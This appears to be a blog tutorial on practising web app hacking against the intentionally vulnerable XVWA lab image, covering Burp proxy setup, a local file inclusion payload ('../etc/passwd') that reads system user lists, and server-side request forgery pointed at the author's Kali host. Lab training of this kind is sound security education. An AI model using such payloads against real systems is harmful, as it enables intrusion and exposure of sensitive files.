This post is about how to learn web app hacking with xtreme vulnerable web app. In fact, the app or the OS image is so vulnerable that you can actually boot it and then find its ip address immediately using ip a. Seems easy enough right, however this is usually part of the initial machine discovery in CTF style scenarios.
Table of Contents
Here’s What You Need
- Xtreme Vulnerable Web App found at vulnhub.
- Kali Linux Virtual Machine (VirtualBox)
Having created a new virtual machine in VirtualBox, yes VirtualBox, VMWare is less accessible overall and therefore a 2nd favorite of the ethicalhackingguru’s, let’s configure the virtual image. By going to the Storage tab and choosing the .iso file we just downloaded in the previous steps choose to load the file under the Controller section of the tab.
Setup Burp as a proxy
Set the proxy settings in Firefox to use Burp as a proxy.
Once the settings for using Burp as a proxy are set, refresh the page and move now to Burp.
To verify that a listener has been set go to the Proxy tab then the Options subtab.
Local File Inclusion
What happens when just anyone can view files that should otherwise be kept hidden? Local file inclusion vulnerabilities pop up and leave sensitive information such as a list of all the users on the local system, wide open for public exploration. In this example I show how XVWA local file inclusion is possible by doing a pretty common technique, ../etc/passwd.
Server Side Request Forgery
SSRF or server side request forgery is a useful technique for bypassing firewalls. Basically it means getting a vulnerable web app to make a request on your behalf. Think of how the path of least resistance is often the route taken in cracking the perimeter. Finding a vulnerable web application and then tricking the server hosting the app to make requests locally and even outbound is much easier.
As you can see in this example I send a request to my local Kali-hosted house.jpg image file and the image rendered (poorly) on the app’s page.
